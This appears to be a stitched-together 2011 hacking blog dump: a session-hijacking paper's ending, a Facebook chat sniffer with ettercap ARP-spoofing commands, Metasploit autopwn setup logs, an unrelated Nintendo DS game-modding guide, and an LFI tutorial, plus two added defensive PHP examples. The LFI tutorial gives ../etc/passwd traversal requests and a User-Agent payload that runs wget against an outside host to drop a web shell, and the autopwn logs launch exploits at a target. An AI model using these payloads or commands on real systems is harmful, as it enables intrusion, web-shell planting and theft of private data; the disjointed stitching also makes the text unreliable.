$fingerprint = md5($string);
?>
[ End PHP CODE ]

Keeping in mind that we're passing the session identifier in a cookie, and this already requires that an attack be used to compromise this cookie (and likely all HTTP headers as well), we should pass this fingerprint as a URL variable. This must be in all URLs as if it were the session identifier, because both should be required in order for a session to be automatically continued (in addition to all checks passing).
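The three defences discussed in +01 and +02 (regenerating the identifier on a fresh session, binding the session to a salted fingerprint of the User-Agent, and requiring a second token in the URL) combined into one guard, as an added example that is not code from the original paper. SESSION_SECRET, the `token` parameter name, the login URL and the use of SHA-256 in place of the paper's MD5 are assumptions of this example.

```php
<?php
// Added example, not code from the original paper: one session guard that
// combines the three defences discussed above. SESSION_SECRET, the token
// parameter name and the login URL are assumptions for this example.
declare(strict_types=1);

const SESSION_SECRET = 'replace-with-a-long-random-server-side-secret';

// Bind the session to request data a legitimate browser keeps constant.
// The secret stops an attacker who captured the headers from simply
// recomputing the fingerprint. SHA-256 is used in place of the paper's MD5.
function session_fingerprint(string $userAgent): string
{
    return hash('sha256', $userAgent . SESSION_SECRET);
}

// Returns true when the request may continue the session, false when the
// caller should fall back to a password prompt.
function start_guarded_session(): bool
{
    // Never accept a session id from the URL: this alone defeats the
    // ?PHPSESSID=123456789 fixation demonstrated above.
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_strict_mode', '1');
    session_start();

    $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';

    if (!isset($_SESSION['initiated'])) {
        // First request of this session: throw away whatever identifier the
        // client arrived with and issue our own, plus a random URL token.
        session_regenerate_id(true);
        $_SESSION['initiated']   = true;
        $_SESSION['fingerprint'] = session_fingerprint($ua);
        $_SESSION['token']       = bin2hex(random_bytes(16));
        return true;
    }

    // Existing session: the stored fingerprint and the URL token must both
    // match. hash_equals() keeps the comparison constant-time.
    if (!hash_equals($_SESSION['fingerprint'], session_fingerprint($ua))) {
        return false;
    }
    return hash_equals($_SESSION['token'], (string) ($_GET['token'] ?? ''));
}

// Every internal link must carry the token, just as it would a URL session id.
function url_with_token(string $path, string $token): string
{
    $sep = strpos($path, '?') === false ? '?' : '&';
    return $path . $sep . 'token=' . urlencode($token);
}

if (!start_guarded_session()) {
    // A failed check is most likely a legitimate user on a changed browser,
    // so re-authenticate instead of silently continuing or hard-failing.
    session_unset();
    header('Location: /login.php?reason=reauth');
    exit;
}

echo '<a href="' . htmlspecialchars(url_with_token('/home.php', $_SESSION['token']))
    . '">continue</a>';
?>
```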
In order to make sure that legitimate users aren't treated like criminals, simply prompt for a password if a check fails. If there is an error in your mechanism that incorrectly suspects a user of an impersonation attack, prompting for a password before continuing is the least offensive way to handle the situation. In fact, your users may appreciate the extra bit of protection perceived from such a query.

There are many different methods you can use to complicate impersonation and protect your applications from session hijacking. Hopefully you will at least do something in addition to session_start(), as well as be able to come up with a few ideas of your own.

====== +03 - Firesheep ======

Recently a Firefox extension called Firesheep has made it easy for public Wi-Fi users to be attacked by session hijackers. Websites like Facebook, Twitter, and any that the user adds to their preferences allow the Firesheep user to easily access private information from cookies and threaten public Wi-Fi users' personal property. Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.

Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win.

Thanks! :)
© Offensive Security 2011
[Version 0.3] Facebook chat sniffer
I threw this together in class yesterday because Facebook was kicking me out when I tried to session hijack.
Version 0.3 http://pastebin.com/qNGuK9ix
save to fbsniff.py, set permissions, copy to sbin
Code:
chmod 755 fbsniff.py
cp fbsniff.py /usr/sbin/fbsniff
start the sniffer
Code:
tshark -i <interface> -w out.cap
start fbsniff
Code:
fbsniff -c out.pcap -l
you can also run it with a basic message filter
Code:
fbsniff -c out.pcap -f "Keegan,Test"
start ettercap
Code:
ettercap -T -M arp -i <interface> // // -P autoadd
Friday, July 8, 2011
BT5 + Metasploit + postgresql (works for me)
I'm working in this mode:
root@bt:~# apt-get install postgresql
root@bt:~# sudo apt-get install libpgsql-ruby
root@bt:~# sudo su postgres
sh-4.1$ createuser root -P
could not change directory to "/root"
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
sh-4.1$ createdb --owner=root metasploit
could not change directory to "/root"
exit
sh-4.1$ exit
exit
root@bt:~# msfconsole
msf > db_driver postgresql
[*] Using database driver postgresql
msf > db_connect root:toor@127.0.0.1:5432/metasploit
msf > db_workspace -a MyProject
[*] Added workspace: MyProject
msf > db_nmap 192.168.1.165 -sS -O
[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-05-14 15:27 CEST
[*] Nmap: Nmap scan report for hackdany-cecb3e.homenet.telecomitalia.it (192.168.1.165)
[*] Nmap: Host is up (0.00055s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: MAC Address: 08:00:27:F1:F2:8F (Cadmus Computer Systems)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3
[*] Nmap: Network Distance: 1 hop
[*] Nmap: OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 3.56 seconds
msf > db_autopwn -p -e -q
[*] (1/51 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.165:135...
[*] (2/51 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.1.165:139...
[*] (3/51 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.1.165:139...
[*] (4/51 [0 sessions............................etc...etc...etc
the work is perfect (FOR ME)
bye
Thursday, July 7, 2011
Modding Golden Eye:rogue agent (concept of making halo)
Required Tools
Dslazy
TilEd 2002
sseq2mid
Kiwi Ds Editor
A Hex Editor
FIRST STEP
extract your clean rom (unedited) with dslazy
Now you will have folders and files like this:
NDS_EXTRACT
data
overlay
header.bin
y7.bin
y9.bin
arm7.bin
arm9.bin
banner.bin
Editing The Game's Icons
go to the data folder, inside the data folder there are many other folders,
to get to the icons go to the folder icons (surprised?)
try to preview one... (it won't work)
they aren't in the average Windows format,
to edit them use TilEd 2002
Using TilEd 2002
Open up TilEd 2002
now click the Browser button (where the File button normally is)
Then click Open
navigate to your icons
(dslazy/NDS_EXTRACT/data/icons)
they won't show up,
click where it says all compatible roms then click all files
then open up an icon (e.g. DrNo.ico)
a jumble of random colors appears,
to fix this click SNES 4bb (see picture)
IMG
now you should get a picture like this image shows
IMG
to fix the colors press the button indicated in the previous picture.
(note this isn't the right palette, could someone please make one?)
copy tiles to the editor window then select paint mode
and edit in the editor window
(these aren't the virtual training icons... they are the ones that pop up when you have to verse "Xenia Onatopp" and other characters in the campaign.)
Text Editing
Objectives and stuff...
Editing Level Objectives Text
I will use Fort Knox as an example
go to:
dslazy\NDS_UNPACK\data\Levels\1_0_FortKnox
open 1_0_Crash.txt with Notepad
now type in the new message (in the same space as the old one)
(try to keep a similar length, otherwise it falls off the screen)
(for more space delete the empty lines between text (but not above the text!))
also works on all the other txt files in the level folders
Editing In Game Text
Remember this txt from level 1?
CODE
YOUR PERSONAL SIDEARM, THE SPEC 9, IS CURRENTLY EQUIPPED IN YOUR RIGHT HAND. PRESS THE R BUTTON TO FIRE YOUR RIGHT HAND WEAPON...PRESS THE L BUTTON TO THROW GRENADES OR FIRE YOUR LEFT HAND WEAPON. YOUR GRENADES WILL BE HOLSTERED UNTIL YOU SWITCH BACK TO THEM BY DOUBLE TOUCHING THE LEFT WEAPON ICON.
OR Even
CODE
NUCLEAR DEVICE LOCATED! NOW DEFUSE IT!
it's in Templates.Crt
open templates.crt in your hex editor then press CTRL+F and search for the string you want (e.g. "NUCLEAR DEVICE" or "YOUR PERSONAL"; for guns just search for their names, e.g. "JACKAL")
edit to your every will (without adding extra hex bytes!), and that's a little more of this game hacked...
EXAMPLE IMAGES:
IMG1
IMG2
(You can edit some of this directly through the rom but it shows a message on boot up something like "Menus Edited Please Recompile")
Editing The Game's Music/Sound
I'm not too sure about this but here's some info I got off the net
Extracting SDAT files
in dslazy/NDS_EXTRACT/data/Sounds there are some files (Sound_All.sdat etc.)
open Kiwi Ds's Editor
then click File/Open
navigate to dslazy/NDS_EXTRACT/data/Sounds
open the file you want to extract,
it will then show up in the editor,
double click it.
this should bring up a new window, now select all.
then click extract selected.
Repacking SDAT files
open Kiwi Ds's Editor
then click Tools/Make SDAT
click source files folder (the ... button)
then navigate to the extracted files directory
Converting SSEQ to MIDI
copy SEQ_MUSIC0.sseq (example) to sseq2mid-20070314\bin
create a new bat/batch file and insert this code
CODE
sseq2mid.exe -1 SEQ_MUSIC0.sseq
pause
pause
this will give you a MID file,
Converting MIDI to SSEQ
kiwids released a program called mid2sseq, (link)
will use soon
Model Swapping Data
incorrect model swapping will cause the game to freeze,
your guns are labeled like 'ar4_commando.nsbmd'
your enemies' guns are labeled like 'npc_assault_rifle.nsbmd'
i will work on a model swapping compatibility list...
(probably on my own site so i can work in html)
Swapping Jackal and spec9 works (animations work too: shoot and reload)
replacing the minigun with the 50 caliber machine freezes the game
this could be due to animation file incompatibilities...
got me a PSP 1001 black (x2)
Yes, 2 PSPs without a battery, but I do have a charger for them. I don't have a Memory Stick Duo; I'm going to buy one from my friend on July 16. Then when I get into PSP game making I'm going to make Halo 2 PSP. It uses Halo 2 sounds and models from Custom Edition; this should make it the H2 version.
Wednesday, July 6, 2011
Metasploit Autopwn fix for Backtrack 5
A lot of people are having trouble with Metasploit's Autopwn feature in Backtrack 5. It does require a little bit of tweaking to get going, below are a few steps to get you on your way.
I prefer to use postgreSQL over MySQL. This tutorial will only show how to properly configure Autopwn using postgreSQL.
First you must determine if you have postgres installed on your system. To do this type the following into a terminal:
ls /etc/init.d/ | grep post
If you do not see "postgresql-8.4" you need to update or install postgresql. This can be done using the repositories:
apt-get install postgresql-8.4 postgresql-client-8.4
Now start the postgreSQL server by typing:
/etc/init.d/postgresql-8.4 start
NOTE: If you receive an error like:
"The PostgreSQL server failed to start. Please check the log output:"
You will need to disable SSL in the config file. To do this, open it in an editor:
nano /etc/postgresql/8.4/main/postgresql.conf
Look for the section like the one below:
Code:
# - Security and Authentication -
#authentication_timeout = 1min # 1s-600s
#ssl = true # (change requires restart)
You simply comment it out like I did above with the "#" sign.
Now restart postgres:
/etc/init.d/postgresql-8.4 start
Now connect to the server and change the password to whatever you want:
sudo su postgres -c psql
ALTER USER postgres WITH PASSWORD 'yoursecretpasswd';
(make sure to use the quotation marks when setting your password, here is a real life example)
ALTER USER postgres WITH PASSWORD 'swordfish';
\q
sudo passwd -d postgres
sudo su postgres -c passwd
(Here you want to use the same password you used a few steps back)
Postgresql is all setup, now to Metasploit.
Start Metasploit by typing: msfconsole
Once Metasploit starts, type: db_driver
If the driver is already loaded it will give an output like below.
If not, you will need to manually load the driver by typing: db_driver postgresql
Now all you have to do is connect to your database by typing (pentest is the name of the database):
db_connect postgres:mysecretpassword@127.0.0.1/metasploit
We are now connected and ready to run autopwn.
Run a nmap scan on the target:
db_nmap 192.68.12.99
To see all of autopwn's options type: db_autopwn
Finally launch autopwn, then sit back and wait:
db_autopwn -p -t -e -r
After autopwn completes type:
sessions -l
Any successful attacks will result in a session. To interact with that session type:
sessions -i 1 (where 1 is the session number)
Monday, July 4, 2011
[LFI]Local File Inclusion and shell upload[Tutorial]
LFI (Local File Inclusion)

1 – Introduction

In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and injecting malicious code in proc/self/environ. It is a step by step tutorial.

2 – Finding LFI

- Now we are going to find a Local File Inclusion vulnerable website. So we found our target, let's check it.
Code: www.website.com/view.php?page=contact.php
- Now let's replace contact.php with ../ so the URL will become
Code: www.website.com/view.php?page=../
and we got an error
Code: Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
big chances to have a Local File Inclusion vulnerability. Let's go to the next step.
- Now let's check for etc/passwd to see if it is Local File Inclusion vulnerable. Let's make a request:
Code: www.website.com/view.php?page=../../../etc/passwd
we got an error and no etc/passwd file
Code: Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
so we go more directories up
Code: www.website.com/view.php?page=../../../../../etc/passwd
we successfully included the etc/passwd file.
Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin

3 – Checking if proc/self/environ is accessible

- Now let's see if proc/self/environ is accessible. We replace etc/passwd with proc/self/environ
Code: www.website.com/view.php?page=../../../../../proc/self/environ
If you get something like
Code:
DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.website.com
HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE= Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80
proc/self/environ is accessible. If you got a blank page or an error, proc/self/environ is not accessible or the OS is FreeBSD.

4 – Injecting malicious code

- Now let's inject our malicious code in proc/self/environ. How can we do that? We can inject our code in the User-Agent HTTP header. Use the Tamper Data addon for Firefox to change the User-Agent. Start Tamper Data in Firefox and request the URL:
Code: www.website.com/view.php?page=../../../../../proc/self/environ
Choose Tamper and in the User-Agent field write the following code:
Code: <?system(wget http://fbi.20x.cc/gov/data/R00TSH3ll.txt -O sh3ll.php);?>
{The Unknown: the link of the shell used has expired, use the link I posted at the end of this thread}
Then submit the request. Our command will be executed (it will download the txt shell from http://hack-bay.com/Shells/gny.txt {The Unknown: the link of the shell used has expired, use the link I posted at the end of this thread} and save it as shell.php in the website directory) through system(), and our shell will be created. If it doesn't work, try exec(), because system() can be disabled on the webserver from php.ini.

5 – Access our shell

- Now let's check if our malicious code was successfully injected. Let's check if the shell is present.
Code: www.website.com/sh3ll.php
Our shell is successfully uploaded.
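The root cause the tutorial walks through is an include() fed straight from the page parameter. As an added example that is not part of the original tutorial, here is that vulnerable pattern beside a hardened version that maps requests through a fixed allow-list; the page names, the pages/ directory and the allow-list contents are assumptions.

```php
<?php
// Added example, not code from the original tutorial: the kind of include
// behind view.php?page=contact.php, beside a hardened replacement. The page
// names, the pages/ directory and the allow-list are assumptions.
declare(strict_types=1);

// Vulnerable: the request parameter reaches include() untouched, so a value
// such as ../../../../../etc/passwd or ../../../../../proc/self/environ is
// read and, if it contains PHP code, executed.
function render_page_vulnerable(string $page): void
{
    include $page;
}

// Hardened: requests are mapped through a fixed allow-list, so no user input
// is ever used as a path.
const ALLOWED_PAGES = [
    'contact' => 'contact.php',
    'about'   => 'about.php',
];

// Returns the file to include for a requested page name, or null to refuse.
function resolve_page(string $requested): ?string
{
    // Accept "contact" and "contact.php" alike, then insist on a short plain
    // identifier before doing the lookup; anything else (slashes, dots, NUL
    // bytes, percent-encoding) is rejected before it can reach the filesystem.
    $key = preg_replace('/\.php\z/', '', $requested);
    if ($key === null || !preg_match('/\A[a-z][a-z0-9_-]{0,31}\z/', $key)) {
        return null;
    }
    return ALLOWED_PAGES[$key] ?? null;
}

function render_page_safe(string $requested): void
{
    $file = resolve_page($requested);
    if ($file === null) {
        http_response_code(404);
        echo 'Page not found';
        return;
    }
    // __DIR__ anchors the include to the application's own pages/ directory.
    include __DIR__ . '/pages/' . $file;
}

// Constructed probes, run on the CLI: the traversal strings from the tutorial
// and a NUL-byte variant are all refused; the legitimate names pass.
function self_test(): bool
{
    return resolve_page('contact.php') === 'contact.php'
        && resolve_page('about') === 'about.php'
        && resolve_page('../../../../../etc/passwd') === null
        && resolve_page('../../../../../proc/self/environ') === null
        && resolve_page("contact.php\0") === null
        && resolve_page('CONTACT') === null;
}

if (PHP_SAPI === 'cli') {
    echo self_test() ? "allow-list checks passed\n" : "allow-list checks FAILED\n";
} else {
    render_page_safe((string) ($_GET['page'] ?? 'about'));
}
?>
```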
All In One Collection Tutorials & Tools Uploaded By sheikh_shahzeb More Than 10 GB
By - sheikh_shahzeb
Infinity Exists Underground and vblog Compete Tutorials
Free File Hosting Made Simple - MediaFire
BT 4 Tutorials
Free File Hosting Made Simple - MediaFire
Milworm Tutorials
Free File Hosting Made Simple - MediaFire
BT Offensive Security Tutorials
Free File Hosting Made Simple - MediaFire
Other Collection of Hacking Videos
Free File Hosting Made Simple - MediaFire
My Ways Of Hacking Go Here
Free File Hosting Made Simple - MediaFire
Must Use Tools in Hacking
Free File Hosting Made Simple - MediaFire
Download BackTrack R2
Free File Hosting Made Simple - MediaFire
Cracking Collection
Free File Hosting Made Simple - MediaFire
join files with WinRAR and HJSplit
to watch videos use K-Lite Media Player and codecs
try suspicious files in a sandbox or in a virtual machine like VMware for your own security; I am sharing VMware here also
http://www.mediafire.com/?0zk8bmcb51033
Here Is First DVD OF CEH Labs Volume 1
CEH Labs Volume 1
If asked for any password, type creativemediafire.tk
it took more than a month to upload, but I think it is useful for all; that's why I am sharing it
100% virus clean, learn ethical ways of hacking